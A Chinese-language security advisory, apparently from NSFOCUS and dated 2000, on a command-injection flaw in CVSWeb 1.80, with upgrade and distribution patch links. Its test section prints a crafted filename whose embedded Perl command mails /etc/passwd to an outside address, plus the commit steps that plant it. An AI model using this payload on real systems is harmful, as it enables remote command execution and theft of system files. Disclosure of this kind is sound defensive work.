首页 -> 安全研究
安全研究
安全漏洞
CVSWeb远程攻击漏洞
发布日期:2000-07-18
更新日期:2000-07-19
受影响系统:
不受影响系统:
CVSWeb Developer CVSWeb 1.80
描述:
CVSWeb Developer CVSWeb 1.89
CVSWeb Developer CVSWeb 1.86
Cvsweb 1.80包含一个安全漏洞,如果攻击者对cvs库有写权限,他就可以远程获得对cvs server的
shell访问权限。出问题的代码在cvsweb.cgi中:
open($fh, "rlog '$filenames' 2>/dev/null |")
攻击者通过建立一个特殊的文件名,来发动攻击。
<* 来源: Wizdumb <wizdumb@mdma.za.net> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
攻击者会首先按照下列步骤操作:
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被
发送给攻击者,当然攻击者也可以执行其他的命令。
建议:
升级到1.86或者更高版本,下载地址:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/
[ Debian Linux ]
Debian GNU/Linux 2.1 alias slink
- ------------------------------------
源码包:
http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc
MD5 checksum: b1810728310882fb72078674521ee369
http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz
MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702
各种平台的二进制包:
http://security.debian.org/dists/stable/updates/binary-all/cvsweb_109_all.deb
MD5 checksum: fe9144254ab224923ac627aef7ec2167
Debian GNU/Linux 2.2 alias potato
- -------------------------------------
注意:potato 还没有正式发布
源码包:
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.diff.gz
MD5 checksum: 9dcb469f5da602cd53e41258febba244
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.dsc
MD5 checksum: b4aceba93a6721486f8ca42f230c7271
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79.orig.tar.gz
MD5 checksum: c755a4c75d4c8844274458ae5953823b
各种平台的二进制包:
http://http.us.debian.org/debian/dists/potato/main/binary-all/devel/cvsweb_1.79-3potato1.deb
MD5 checksum: 1b89d61312925ee7934108c4f638d912
Debian GNU/Linux unstable alias woody
- -------------------------------------
注意:woody 还没有正式发布
源码包:
http://http.us.debian.org/debian/dists/woody/main/source/devel/cvsweb_1.86-1.diff.gz
MD5 checksum: e3fc2117d689746eaa2cf4c8a701aa4e
http://http.us.debian.org/debian/dists/woody/main/source/devel/cvsweb_1.86-1.dsc
MD5 checksum: 0b2b9bf0b1fe39552da03698ba37bc36
http://http.us.debian.org/debian/dists/woody/main/source/devel/cvsweb_1.86.orig.tar.gz
MD5 checksum: ea93ed274ec6fbd49cec57c759747cb7
各种平台的二进制包:
http://http.us.debian.org/debian/dists/woody/main/binary-all/devel/cvsweb_1.86-1.deb
MD5 checksum: a99c605e0d77f1c56a82c95a3dc6d83f
[ Linux-Mandrake 7.1 ]
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.1/RPMS/cvsweb-1.80-3mdk.noarch.rpm
MD5校验码:2a435a7edf358f59a93eb5534efcd273
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates/7.1/SRPMS/cvsweb-1.80-3mdk.src.rpm
MD5校验码:24b7d490f63e154c88909c9b214793e0
浏览次数:6183
严重程度:0(网友投票)
绿盟科技给您安全的保障